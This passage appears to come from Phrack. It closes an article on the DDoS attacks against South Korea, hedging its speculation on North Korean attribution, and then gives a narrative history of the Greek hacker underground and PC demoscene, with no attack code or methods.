military purposes. In conclusion, the judgement through the technical
|
|
analysis about the question, `who are attackers?' has not been disclosed to
|
|
the public. In a nutshell, the attacker may be a guy, a group, an
|
|
organization, or a country that holds its ground against opponents and so
|
|
has an obvious justification to attack or wants to seize the hegemony of
|
|
internet world.
|
|
|
|
For whom are not interested in this kind of general and abstract
|
|
conclusion, following judgements and the grounds can be given. This is
|
|
based on a simple presumption, so you'd better not take it too seriously.
|
|
|
|
The first ground of presumption that NK could be a probable attacker is
|
|
GNP(Grand National Party) and Chosun Ilbo were included in the attack
|
|
target list. GNP is the ruling party of South Korea and its philosophical
|
|
background is based on conservatism, and it is hostile to NK from a
|
|
political standpoint. Chosun Ilbo is also a leading conservative media and
|
|
has a hostile point of argument to NK. The contention of Chosun Ilbo has
|
|
not always been rational and showed us it may manipulate public opinion for
|
|
its profit. Of course, people of progressive idea are not always friendly
|
|
to NK without any condition. The fact that these two targets which can be
|
|
hostile to NK for their political reasons are included in the list makes us
|
|
guess the attack might be conducted by NK. This judgement came from the
|
|
special situation of the Korean Peninsula.
|
|
|
|
The target list of 3.4 DDoS attack contains a particular web site. It is
|
|
Dcinside, a common community web site. If the attack had been for political
|
|
purpose, the web site would have had no reason to be in the list. By the
|
|
way, on January 5, 2011, some posts to blame for NK's leaders were
|
|
registered in one of NK web site, uriminzokiri.com which the Committee for
|
|
the Peaceful Reunification of the Fatherland manages to propagate NK's
|
|
political system. On January 8, 2011, the twitter account of NK(@uriminzok)
|
|
was compromised and attackers posted some critical comments about NK and
|
|
the leader Kim Jeong-il, Kim Jeong-eun. Some members of Dcinside insisted
|
|
they did. After two months later, Dcinside was in the list of target. This
|
|
is the second ground of presumption.
|
|
|
|
Police of South Korea presumed the attack of NK because the source IPs of
|
|
attack might have been DPS's which DPS of NK hires in China. But one police
|
|
concerned told a press, "It is difficult to make clear the exact entity
|
|
about the main body of this DDoS attack."[8] This shows us that the
|
|
judgement of police might not be clear. To ensure a clear evidence, police
|
|
told the press they would do a cooperative investigation with China police,
|
|
but the results of any cooperative investigation has not been released yet.
|
|
Because only small number of people possess some sensitive information,
|
|
various conspiracies seem to appear.
|
|
|
|
Some people who think the attack didn't come from NK suggest the
|
|
followings: if NK had a perfect attack plan and was not an idiot, they
|
|
would not revealed the IP addresses she hired in China with causing
|
|
political problems. On the contrary, the third force who is familiar with
|
|
the tension of two Koreas and want to use this situation for its profit
|
|
rather conducted the attack.
|
|
|
|
A lot of detailed technical analysis has been published many times in korea
|
|
since the two attacks. In the technical documentations and presentations,
|
|
the experts of South Korea didn't specify the source of the attacks because
|
|
they are afraid of arbitrary interpretation by some people. South Korea is
|
|
a divided country and any information can be interpreted arbitrarily by
|
|
some people depending on their political or ideological purposes. In the
|
|
white paper, "Ten Days of Rain" of McAfee, we can find this part, "This may
|
|
have been a test of South Korea's preparedness to mitigate cyber attacks,
|
|
possibly by North Korea or their sympathizers."[9] This has been quoted
|
|
mainly by some conservative organizations and medias for their political
|
|
purposes to confirm the attack of NK.
|
|
|
|
|
|
--[ 6 - Some prospects
|
|
Some phenomena(for example, making zombie PCs regularly) of the preparation
|
|
for a powerful DDoS attack has been detected. I am not sure this is the
|
|
extension of the past and conducted by the past attackers. However, if a
|
|
new attack occurs, the attacker will test new techniques and South Korea
|
|
will inspect her defense systems. Of course, South Korea will also be able
|
|
to have a chance to establish a new defense system and more advanced attack
|
|
techniques.
|
|
|
|
South Korea has carried out more than material preparations through the
|
|
various forms of cyber attacks. This is because South Korea government and
|
|
companies realized the importance of hackers' help. This started from
|
|
getting over the wrong awareness about hackers in the past. However, when
|
|
they looked for good hackers who could help them, they realized that there
|
|
were not so many hackers as they wanted. So, the need of running programs
|
|
that can foster good hackers has begun to rise.
|
|
|
|
About ten years ago, the hackers of South Korea organized communities and
|
|
hacking teams by themselves, and proceeded various researches and
|
|
discussions. At that time, they had strong desire for knowledge and pure
|
|
research, and their findings were shared freely with little thought of
|
|
money. And they didn't use their knowledge for the purpose of financial
|
|
crime. But the government and companies considered hackers as criminals.
|
|
Sometimes, police tried to arrest hackers for their own profits and blocked
|
|
their activities. In this kind of oppressive situation, hacker had to stop
|
|
their growth momentarily. Consequently, this led to the retreat of cyber
|
|
defense capabilities of South Korea. Hackers can't post an exploit code in
|
|
a web site. Because the related law defines 'hacking' too comprehensively,
|
|
so it is still illegal to post an exploit code in an open web site in South
|
|
Korea.
|
|
|
|
Watching various cyber attacks for the purpose of political and financial
|
|
reasons around the world, the government and companies of South Korea
|
|
realized that bringing up hackers is closely linked to the defense of
|
|
country and profits of companies. So, they run some hacking contests to
|
|
find good hackers and support some hacking and security clubs of
|
|
universities. These kinds of action are still not so well formed to the
|
|
level of systematically perfect process, but these fostering programs are
|
|
expected to be proceeded in more concrete shape through various cyber
|
|
attacks.
|
|
|
|
Of course, the hackers of South Korea have tried to prove the value of
|
|
their existence and to grow up by themselves without any help of government
|
|
and companies. For instance, they have participated in the finals of DefCon
|
|
CTF since 2006. In 2006, 'East Sea'(This refers to the territory of Korea)
|
|
team went to the final of DefCon CTF and this was the first time for a
|
|
foreign team to take part in it. And this led to the organization of one
|
|
team for DefCon CTF which consisted of some members of leading hacking
|
|
teams of South Korea. This was helpful to correct the wrong awareness of
|
|
media about hackers. And some hacking and security conferences have been
|
|
held every year by hackers. Even some hackers take part in the penetration
|
|
test projects for government. The hackers of South Korea now prove their
|
|
contribution and existence value through these activities.
|
|
|
|
There will be two important elections, a general election and a
|
|
presidential election in South Korea next year. And some political attacks
|
|
can be expected regardless of the types of attack.If some large-scale
|
|
attacks occur again next year, some people will likely assert it as a
|
|
conduct of NK even if it is not by NK. Some politicians of two Koreas fell
|
|
under suspicion of bringing unrest on the peninsula intentionally to
|
|
achieve their political goals at the time-sensitive period.
|
|
|
|
We can easily anticipate various forms of attack to occur continuously if
|
|
the division state of two Koreas remains, and new strains occur, or if
|
|
someone or country needs them for profit. Currently, one of the best
|
|
solutions for this problem is to relieve the political tensions through the
|
|
promotion of common interests of surrounding countries of the Korean
|
|
Peninsula and to achieve the cooperation relationship. The stability of the
|
|
Korean Peninsula can contribute to the peace of the world as well as East
|
|
Asia owing to the close connection of countries.
|
|
|
|
|
|
--[ 7 - References
|
|
[1] Seong-jin Hwang, Young-il Gong, Hyun-ki Hong, Sang-ju Park, "Report
|
|
about Cooperation in Broadcast Communications Between South Korea and
|
|
North Korea"
|
|
[2] http://www.sisaseoul.com/news/quickViewArticleView.html?idxno=1154
|
|
[3] http://news.chosun.com/site/data/html_dir/2011/06/01/2011060100834.html
|
|
[4] http://www.dt.co.kr/contents.html?article_no=2011070102010251746002
|
|
[5] http://www.nosotek.com
|
|
[6] Chan-mo Park, "Software Technology Trends of North Korea"
|
|
http://www.postech.ac.kr/k/univ/president/html/speeches/20030428.html
|
|
[7] http://www.ahnlab.com/kr/site/securityinfo/newsletter/magazine.do
|
|
[8] http://www.seoul.co.kr/news/newsView.php?id=20110407008034
|
|
[9] McAfee, "Ten Days of Rain - Expert analysis of distributed
|
|
denial-of-service attacks targeting South Korea"
|
|
http://dok.do/srVOcq
|
|
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
What's past is prologue
|
|
anonymous underground greek collective - anonymous_gr@phrack.org
|
|
|
|
|
|
----[ Introduction
|
|
|
|
First things first. This is the second part of the previous scene phile on
|
|
the Greek underground scene [GRS]. Although the primary authors are the
|
|
same as the first part, this time many people contributed information,
|
|
stories, facts and even whole paragraphs of text. We were positively
|
|
surprised by the response and the attitude of the community that decided to
|
|
help us in order to make this second part better. Hence the new authorship
|
|
details. Also, the email alias from above is now forwarded to the people
|
|
that helped.
|
|
|
|
The truth is that we had a great time receiving irrelevant flames by
|
|
people who didn't even read the first two paragraphs of our previous scene
|
|
phile. In a struggle to avoid future unfortunate comments, we would like
|
|
to stress the fact that we are not capable of talking about every aspect
|
|
of the Greek scene in just a few paragraphs. In fact, space is not the
|
|
only problem. Privacy is a fundamental characteristic of all scenes. There
|
|
are people who don't want to publish or openly talk about their actions,
|
|
and there are certain stories/facts that we are not aware of. That said,
|
|
we believe that the following text covers, not all, but a fair amount
|
|
of the history of the Greek scene. If you don't comprehend the previous
|
|
sentences, then maybe you should try reading something else. Or maybe
|
|
try writing/producing something yourself, huh? How about that?
|
|
|
|
We would also like to remind you that we will once again try to refrain
|
|
from referring to particular nicknames/handles. We will, instead, give a
|
|
macroscopic view of our scene's past glory. Btw, you may notice a focus on
|
|
cities other than Athens. That's a byproduct of the fact that most of the
|
|
people that provided information are not from Athens.
|
|
|
|
|
|
----[ Dawn of time
|
|
|
|
At the dawn of time there were BBSes. And FidoNet.
|
|
|
|
The very first BBS in Greece, named .ARGOS system, started operating in
|
|
late 1984. It was a non-networked BBS, mostly built around a message
|
|
bulletin board. It was arguably the first online community in Greece.
|
|
Another early BBS was AcroBase established in 1988 [ACR]. The next major
|
|
event was in 1989 when the first FidoNet nodes in the city of Thessaloniki
|
|
became active. They connected the Greek BBS community to the world by
|
|
FidoNet mail and several local and global echomail (usenet news-like)
|
|
areas. In 1992 Compupress [CPS], a very creative and innovative (for
|
|
Greek standards ;) publishing company, very famous among Greek computer
|
|
users, launched its BBS, codenamed "Compulink". 1994 most people agree that
|
|
it was the "Golden Era" of Greek BBSing. There were around 100 FidoNet
|
|
nodes in most urban and rural areas of Greece. The "Twilight Zone" BBS was
|
|
offering public access to a selected choice of usenet groups and public
|
|
access to Internet email through a UUCP-to-FidoNet gateway. Several
|
|
regional and some international FidoNet-technology networks other than
|
|
FidoNET connected most of the amateur computer community in Greece at that
|
|
time. In Thessaloniki there were weekly FidoNet meetings every Friday,
|
|
forming the first stable, most widespread and long-lived (till today!)
|
|
Greek amateur computer society. There were meetings hosting over 30 to 40
|
|
people, in times when Computing and Information Technology were terms
|
|
almost unheard of in Greece. In 1996, the FidoNet nodelist count drops to
|
|
51. This was mainly due to the increasing number of ISPs and dialup users,
|
|
and it was the start of demise for the BBS/FidoNet era of Greece.
|
|
|
|
Around that time, Compupress' Compulink BBS evolved into a full blown,
|
|
but tiny, ISP that provided dialup access to the Internetz while at the
|
|
same time maintaining its BBS service. In 1995-97 the Greek underground
|
|
was heavily involved in hacking Compulink and its BBS services; there
|
|
were a lot of incidents and even formal complaints. The fights between
|
|
Compulink's administrators and well-known members of the underground are
|
|
almost legendary. This era saw the founding of several hacker (with and
|
|
without quotes) groups, and is considered by many as the birthplace of
|
|
the Greek scene.
|
|
|
|
At this point we should mention that Compupress was the publisher of Pixel,
|
|
a very famous and influential magazine for personal computers. Pixel first
|
|
appeared in 1983 and usually included type-in programs as code listings! In
|
|
1987, Pixel published the details for one of the oldest virii written by a
|
|
Greek guy [PIX]. The virus was randomly displaying the message "Program
|
|
sick error. Call doctor or buy Pixel for cure description". Leet or what?
|
|
|
|
In the following years, more companies entered the Internet market and
|
|
Internet access started to spread. Early ISPs were just charging a yearly
|
|
fee for dial-up access, and each phone call to them costed a small one-time
|
|
amount (~20 drachmas). These led to a lot of people downloading warez off
|
|
Usenet, idling on the Greek IRC network (GRNET) and wardialing. The suits
|
|
of the ISPs and the phone company (OTE) saw that as a cash cow to milk,
|
|
reacted quickly and established time-based charging (security counter
|
|
measures? :p). That's the point it started to become expensive for
|
|
end-users to access the Internet.
|
|
|
|
This period saw the emergence of a lot of "hacker" groups. This time the
|
|
quotes are necessary, however there were noteworthy exceptions. Most of
|
|
these groups focused on attacking the ISPs of the time. In one specific
|
|
incident, the ISP Hellas On-Line (HOL) was hacked and its main password
|
|
file was stolen and exchanged in the underground. In order to cover the
|
|
breach and cause confusion, HOL is rumored to have started distributing a
|
|
fake password file among the underground. What needs to be highlighted is
|
|
that this was one of the first 'dirty or at least "less than sincere"
|
|
incident response tactics' used by companies as they started to become
|
|
targets to attacks.
|
|
|
|
At this time most of the serious hackers were mainly individuals, sometimes
|
|
organized in anarchy groups that used to have fun breaking things, both
|
|
metaphorically and literally :) Some day in 1995, #grhack (!= grhack.net)
|
|
gets established in undernet. #grhack was an IRC room where several skilled
|
|
people used to hang out and exchange information. #grhack is still so
|
|
respected among the Greek hackers that several lame Greek cockroaches try
|
|
to convince one another that they were supposedly active back in the day
|
|
(fuck off, you know who you are). It was in #grhack that the term "GHS"
|
|
(Greek Hackers Society - "S" for "Society" and *not* "Scene") first
|
|
appeared. GHS was exactly what the initials described, a community that
|
|
consisted of people with respectable and notable skill set and state of
|
|
mind, people that actually *hacked* (as opposed to the ones whose knowledge
|
|
is limited to merely running sqlmap and other canned tools).
|
|
|
|
Additionally, members of #grhack were also the creators of hack.gr and
|
|
grhack.gr [GGR], two old school sites representing the state of the
|
|
scene at the time. It's interesting to note that the hack.gr user pages
|
|
are still up and running at [HGR] (most people listed there are/were
|
|
respectable, however some idiots also managed to get there). Also,
|
|
grhack.gr is still maintained by one of the guys (greets and respect)!
|
|
|
|
Of particular mention was a group of hackers situated mainly (but not
|
|
strictly) at the city of Patras and associated with hack.gr. They had
|
|
advanced skills, anarchist ideologies, and weird links with mind-expanding
|
|
experiences (LSD? Who knows... ;). It is clear that their mentality had a
|
|
lot to do with their deep education and love of reading (outside technology
|
|
as well). A couple of them even transcended the borders of Greece and
|
|
became members of the famous hacking group ADM. Their work was and still is
|
|
inspirational to a lot of us. It is also worth noting that apart from ADM,
|
|
members of the Greek underground have participated in or have been founders
|
|
of other famous hacking groups or communities such as w00w00,
|
|
ElectronicSouls, el8, 9x, POTS and probably others.
|
|
|
|
1996-1999 was a high time for the Greek computer underground related
|
|
press (the traditional mainstream computer press was dominated by the
|
|
RAM magazine). Several publications surfaced, "Laspi", "The Hack.gr
|
|
Gazette" and many more. Their focus was primarily on the freedom of
|
|
speech/information. Some of them were humorous, while others used caustic
|
|
words to describe, according to the authors, unethical acts of people
|
|
who got famous by abusing the term "hacking". For example, "Ypokosmos tou
|
|
Internet" [IUW] (Internet Underworld) was one of the most famous zines,
|
|
kinda like el8, ZF0 etc ;). Internet Underworld focused on exposing
|
|
the security and privacy related blunders of ISPs and other poorly
|
|
maintained organizations/companies without however publishing private
|
|
data online. It was created in response to the "Kosmos tou Internet"
|
|
(Internet World), a traditional press magazine. The Internet Underworld
|
|
zine was shut down by OTE officials who threatened(?) VRnet (their hosting
|
|
provider) with disconnection. The interested reader can find more details
|
|
at [ISE] and [TEL], two articles that give more information on the
|
|
publications of the time (unfortunately they are in Greek but Google
|
|
Translate is your friend).
|
|
|
|
In 2001 the first Greek "con" took place in Athens. It was called "HOUMF!
|
|
Con version 0.0" (Hacking Organisation of Unix Mother Fuckers [HMN]) and it
|
|
brought together people from the Greek underground with interests in
|
|
security and hacking [HMF]. Since it was only a "demo" (hence the 0.0
|
|
version number :) of a full conference, there were only three talks given
|
|
[HMT]. However it was considered a huge success since there were about
|
|
150 participants, an impressive number if you consider the size of the
|
|
Greece scene at that (and this really) time. By the end of December 2000,
|
|
more than 100 people had expressed their interest to attend it!
|
|
|
|
HOUMF v1.0 was scheduled for the April of 2002. Due to the media
|
|
going berserk on a new disease spread at the time, the organizers were
|
|
unable to find a room to host the meeting. Preparations ended abnormally,
|
|
disappointing a lot of people who would love to attend. It was then when
|
|
most Greeks did what they knew best; Troll and flame the organizers for
|
|
no obvious reason. The truth is that there hasn't been any attempt for
|
|
another underground con in Greece since then. Crappy remarks from worthless
|
|
people aside, the truth is, if anyone was better at organizing an
|
|
underground con of this magnitude, they'd just be doing it already.
|
|
|
|
Around 2000-2001 two more groups appeared in the scene, USF (United
|
|
Security Force) and UHAGr (United Hackers' Association of Greece). Both
|
|
were quite active in efnet and undernet, so, several people may recall
|
|
their names as well as both good and bad memories along with them. It's
|
|
quite notable that there was an interesting hatred among the members
|
|
of the two teams, maybe mostly because of personal differences, but
|
|
looking back in time one can only see the fun part of it. USF and UHAGr
|
|
both had their own websites; www.infected.gr [INF] and www.uhagr.org
|
|
[UHA] respectively, where one could see a bunch of releases (papers,
|
|
codes etc.) as well as funny material, pics from meetings and so on. As
|
|
far as we know, members of the two teams used to meet in real life in
|
|
Thessaloniki and Athens in order to have fun and break things.
|
|
|
|
In 2003-2004, r00thell came into existence. r00thell wasn't a team in the
|
|
strict sense, it was an active think-tank of 5-6 people mostly interested
|
|
in exchanging techniques and ideas. One of the most funny things about
|
|
r00thell was their members' interest to explore exotic architectures
|
|
which eventually led to a development of a whole heterogeneous network
|
|
that these guys had access to (AIX, SunOS, HP-UX, etc.). If r00thell had a
|
|
leader that would be the webmaster of kizoku.r00thell.org, a security
|
|
portal were one could find interesting texts and several resources. A very
|
|
interesting 'about' page can be found at [R00], titles of some texts at
|
|
[R0T] and some projects they used to work on at [ROP].
|
|
|
|
The same (more or less) people that spawned r00thell, were the
|
|
creators of other communities as well. Ono-sentai [ONO] was such an
|
|
example. Ono-sentai was born some time around 2001-2002 and it seems
|
|
like the members had really fun times. It's unfortunate that the site
|
|
is written in greeklish; we wish everyone was able to read the sections
|
|
'about' and 'kotsanes'! Nevertheless, the website features technical
|
|
content that may be in value even nowadays (wardialing results, local root
|
|
exploits, papers and other resources which are worth studying). Apart from
|
|
the technical content, ono-sentai became very famous for the detailed
|
|
treatise on the non-existence of Santa-Clause (!) which you can find at
|
|
[ONS]. We'd love to see an English version of this text; maybe we will
|
|
some day convince the guy who wrote it to do a proper translation :p
|
|
For now, you can try Google Translate on it :p
|
|
|
|
It has always been believed that many members of the Greek underground
|
|
struggle to mimic the behavior of certain USA groups/communities. We
|
|
believe this is not an issue specific to our local scene and it's not
|
|
bad either, at least not by default ;). In the past, several people have
|
|
tried to follow the principles of pr0j3ct m4yh3m but most of them have
|
|
failed miserably. Back in 2001, a zine called 'keyhole' started to
|
|
circulate in the underground. 'Keyhole' was a zine like el8, h0no etc but
|
|
only made it to the first issue ;) The zine's authors, calling themselves
|
|
'OSS' (Open Secret Society), pretended to be anonymous hackers that exposed
|
|
people for fun; A few days later, their identities became known. Most
|
|
people agreed that 'keyhole' was a bad move; as far as we know, no one
|
|
of the guys being flamed in the zine had hurt the authors.
|
|
|
|
'Keyhole' was immediately considered an unjustifiable show-off that
|
|
displeased several members of the Greek underground. It later became
|
|
obvious that a group of people, named 'CUT' (Ch0wn Unix Terrorists)
|
|
[CUT], were displeased the most; after managing to identify the 'keyhole'
|
|
authors, CUT broke into their servers, sniffed mails, IRC logs and other
|
|
funny material and eventually published a zine called 'asshole' which
|
|
was considered a reply to 'keyhole' (hence the name). An interesting
|
|
manifesto [CMN] was also sent to a famous Greek security portal. Although
|
|
we believe that publishing sensitive private information is unethical,
|
|
'asshole' showed the 'keyhole' authors what it feels like to have your ass
|
|
exposed. In the manifesto, the authors of 'asshole' reacted to all that
|
|
'whitehat vs. blackhat' bullshit that had started to affect the Greek
|
|
communities.
|
|
|
|
Since that time, more zines have emerged in our local communities
|
|
usually targeting individuals. Our advice: If you don't like someone,
|
|
just ignore them :)
|
|
|
|
To our knowledge, the first arrest in Greece related to computer crime law
|
|
took place in the September of 2000. It was a surprising and unprecedented
|
|
move made by the Greek authorities, since prior to this incident there had
|
|
been only warnings(?) so to say from law enforcement just to scare people
|
|
off. The CCU (Computer Crime Unit) managed to locate and arrest a student
|
|
of the Engineering School of Xanthi, who was later charged for causing
|
|
damage to a very famous Greek ISP. Before this very first arrest, most
|
|
people in the local hacking communities ignored the presence of
|
|
intelligence agencies, but this unfortunate event signaled a new era of the
|
|
Greek underground; an era characterized by an inherent suspicion in members
|
|
of the underground that even their closest friends could be members of
|
|
intelligence agencies. Unfortunately, this is a delicate issue which we
|
|
wouldn't like to discuss further. Many people seem to be involved and we
|
|
wouldn't like to hurt anyone.
|
|
|
|
Last but not least, here's a list of other communities that were (or
|
|
maybe still are) active within the Greek underground:
|
|
|
|
1. System Halted
|
|
|
|
2. Ethnic/nationalistic groups (which shall remain unnamed).
|
|
|
|
|
|
----[ Demoscene
|
|
|
|
The demoscene has always been an integral part of the computer underground.
|
|
A lot of people believe it may be its pure heart nowadays that so many
|
|
things in rest of the underground scene seem to be corrupted and rotten.
|
|
|
|
This part of the phile concerns the past of the PC demoscene in Greece.
|
|
That is not to say that the greek demoscene has been PC-only. Sceners from
|
|
such platforms as the Amiga, Atari, CPC, C64 and Spectrum have been part of
|
|
its mosaik. We, however, are going to focus on the PC-specific demoscene.
|
|
|
|
In the introduction we stressed the fact that we wouldn't like to refer
|
|
to particular nicknames of the Greek scene. Nevertheless, the demosceners
|
|
had no problem having their nicknames revealed, so, we thought it would
|
|
be nice to give credit where credit is due ;)
|
|
|
|
As in most cases, one would expect the PC demoscene to have originated
|
|
from big cities like Athens or Thessaloniki (where over 50% of the
|
|
country's population is located), but surprisingly that was not the case.
|
|
The story goes back to 1992 in the town of Katerini, where a group called
|
|
ASD (Andromeda Software Development) was formed, and started uploading
|
|
small productions to COSMOS BBS, a local Bulletin Board System. The group
|
|
in the beginning consisted of Navis and Incus, creating PC utilities, but
|
|
later Amoivikos joined them, and as a team decided to turn into graphics
|
|
programming. Although Navis had previously coded various effects in C64 and
|
|
PC, Cdemo5 should be considered the group's first demo.
|
|
|
|
Meanwhile, three university students in Athens (Laertis, Jorge and
|
|
Zeleps), decided to put a group together called Nemesis, but only released
|
|
one single production in 1994 called spdemo which was an advertisement
|
|
for a local BBS called Spectrum. It was quite a big thing when Megaverse
|
|
BBS came online in the city of Patras around 1993. It functioned as a
|
|
local demo repository, copying demos directly from Future Crew's own
|
|
Starport BBS in Helsinki and distributing them locally. Dgt, the owner
|
|
of Megaverse, along with emc, fm, gotcha and nEC, most of them users of a
|
|
local BBS called Optibase, formed a group called dEUS which was destined
|
|
to play a big part in the Greek PC demoscene. moT, the group's musician,
|
|
was finally added to the group, which led to the release of their first
|
|
production called Anodyne on the 5th of July 1994. dEUS was the first
|
|
group in Greece to incorporate some kind of design in their demos and
|
|
the first to submit a production, a 64k intro, to the Assembly Demoparty
|
|
in Finland, although they never got past the preselection round. More
|
|
importantly though, they were the first group to organize a demoparty in
|
|
Greece. This initiative would eventually result to Patras becoming in a
|
|
way a "capital" for the greek demoscene. The first demoparty that dEUS
|
|
organized took place on April 28, 1995 in an abandoned bank branch in
|
|
the center of Patras and was a big success, gathering sceners from all
|
|
around the country. ASD won the first place in the demo competition with
|
|
their demo "Counterfactual", marking the beginning of their long winning
|
|
career. The same year saw the formation of another group. Demaniacs were
|
|
found in February of 1995 in Xanthi, by Cpc and NeeK, two students at
|
|
the Democritus University of Thrace, who after watching Second Reality,
|
|
decided to make something alike on their own, leading to an intro called
|
|
"pandemonium". Later that year Theo joined them as a musician, leading
|
|
finally to their first production with sound in March 1996. Gardening 96
|
|
took place the following year, this time at the University of Patras'
|
|
theater, which became the standard location for the parties that
|
|
followed. The third and last Gardening event took place in 1997 at the
|
|
same location. At that time, many other groups existed, notably Helix,
|
|
Debris, Arcadia and Red Power. Little did anyone at that time know it
|
|
would be the last of The Gardening demoparties. And suddenly, that was
|
|
it. No demos came out for the following four years, no parties took place,
|
|
and the scene seemed quite dead. When in the the year 2000 a LAN party,
|
|
organized by many sceners took place in Athens, it was the closest it
|
|
could get to a sceners' meeting. However, no productions came out of it.
|
|
|
|
It was the following year that something significant happened. A
|
|
demo-dedicated channel was created in GrNet, a greek IRC network, and
|
|
gathered many of the previously scattered greek sceners as well as new
|
|
ones. This led to an actual demoparty taking place. Digital Nexus 2001,
|
|
which took place in Athens, and was organized by cybernoid, apomakros,
|
|
doomguard and Abishai. ASD won the demo compo once more, presenting
|
|
"Cadence and Cascade", the first Greek GPU-accelerated demo, which
|
|
signaled a new era for the Greek demoscene. It is not well known though,
|
|
that at the same party, Psyche, Raoul and zafos, three students from the
|
|
university of Patras, resolved to revive the Gardening demoparties that
|
|
had taken place at their University a while ago, and to form a demo group,
|
|
later called nlogn. The fruit of their cooperation was a new demoparty
|
|
called ReAct, which tried to revive the Gardening atmosphere, and took
|
|
place on the 19th of April 2002. ASD with aMUSiC, their first musician
|
|
since the group's formation, won the demo compo with their demo "Edge of
|
|
Forever". The Greek demoscene seemed to be entering a new era indeed. A
|
|
few new groups appeared, such as Quadra, The Lab, Psyxes, Nasty Bugs,
|
|
nlogn and Sense Amok and things for a while looked promising. However,
|
|
most (if not all) of the newly formed groups never released more than a
|
|
couple of productions, and never managed to reach the level of productions
|
|
that were made outside of Greece. Older groups, apart from ASD, never
|
|
managed to release any new productions. Most of them disbanded but kept
|
|
coming to parties. ReAct took place in 2002, 2003 and 2004, and then a
|
|
demoparty called Pixelshow, organized by gaghiel, continued this long
|
|
running tradition of having a party in the University's theater. Pixelshow
|
|
took place twice, in 2005 and 2007 (the 2006 event was cancelled), and was
|
|
the last demoparty to have taken place in Greece so far.
|
|
|
|
Some things should be added concerning ASD at this point, since their fame
|
|
is way beyond the Greek demoscene. Although almost no Greek group ever
|
|
achieved fame outside Greece, ASD is one of the most famous demogroups
|
|
worldwide. They currently hold the record of scoring four times 1st place
|
|
in the combined demo compo of the Assembly demoparty, as well as having
|
|
received eleven scene awards (demoscene's most prestigious award) so far.
|
|
Their productions are marked by painstaking attention to detail, extremely
|
|
well crafted transitions that have become their trademark, as well as a
|
|
progressive metal soundtrack most of the times, composed by aMUSiC and
|
|
Leviathan, the group's musicians.
|
|
|
|
|
|
----[ What's past is prologue
|
|
|
|
Relax, take a deep breath and try to think what do you want your place to
|
|
be in the great scope of things. The (Greek) scene will go on with or
|
|
without you, with or without any one of us. The scene is a collective.
|
|
Respect it and it will respect you back. Give to it and you will receive.
|
|
Understand the true spirit of hacking and stop being a Chrysaora Sqlmapis
|
|
[SUB].
|
|
|
|
In order to write this article, we contacted several people to ask for
|
|
information. A lot of people helped not only with information, but also
|
|
with anecdotes and even actual text. They have our respect and we thank
|
|
them. Of particular mention are zafos/nlogn and amv/ASD. Also, we respect
|
|
the fact that some people didn't want to share or have their stories
|
|
made public, but nonetheless provided helpful feedback. Thank you guys
|
|
too.
|
|
|
|
|
|
----[ References
|
|
|
|
[GRS] http://phrack.org/issues.html?issue=67&id=16
|
|
[ACR] http://www.acrobase.org/
|
|
[CPS] http://en.wikipedia.org/wiki/Compupress
|
|
[PIX] http://www.f-secure.com/v-descs/pixel.shtml
|
|
[GGR] http://www.grhack.gr/ and http://www.grhack.gr/first_page/
|
|
[HGR] http://users.hack.gr/
|
|
[IUW] http://web.archive.org/web/19990428222240/http://iuworld.vrnet.gr/
|
|
[ISE] http://www.isee.gr/issues/01/special/
|
|
[TEL] http://www.e-telescope.gr/el/internet-and-computers/
|
|
47-online-journalism
|
|
[HMF] http://web.archive.org/web/20011020020500/houmf.org/v0.0/
|
|
[HMN] http://web.archive.org/web/20020208000350/
|
|
http://ono-sentai.jp/readkotsanes.php?id=11
|
|
[HMT] http://web.archive.org/web/20011212094327/http://houmf.org/v0.0/
|
|
papers.go
|
|
[INF] http://web.archive.org/web/20011202184457/http://www.infected.gr/
|
|
[UHA] http://web.archive.org/web/20030806115340/http://www.uhagr.org/
|
|
[R00] http://web.archive.org/web/20050220152149/
|
|
http://www.r00thell.org/about/
|
|
[R0T] http://web.archive.org/web/20050220232518/
|
|
http://www.r00thell.org/papers/
|
|
[ROP] http://web.archive.org/web/20031007021404/
|
|
http://r00thell.org/projects.php
|
|
[ONO] http://web.archive.org/web/20020330152233/http://ono-sentai.jp/
|
|
[ONS] http://web.archive.org/web/20020305052051/
|
|
http://ono-sentai.jp/readkotsanes.php?id=3
|
|
[SUB] http://tinyurl.com/882vez7
|
|
[CMN] http://web.archive.org/web/20050218172857/
|
|
http://www.ad2u.gr/mirrors/CUT.txt
|
|
|
|
http://web.archive.org/web/20050219114701/
|
|
http://www.ad2u.gr/mirrors/toxicity.email
|
|
[CUT] http://web.archive.org/web/20050206231527/
|
|
http://www.ad2u.gr/article.php?story=20030105175233835
|
|
|
|
|
|
----[ EOF
|
|
|
|
Aaand... stop. |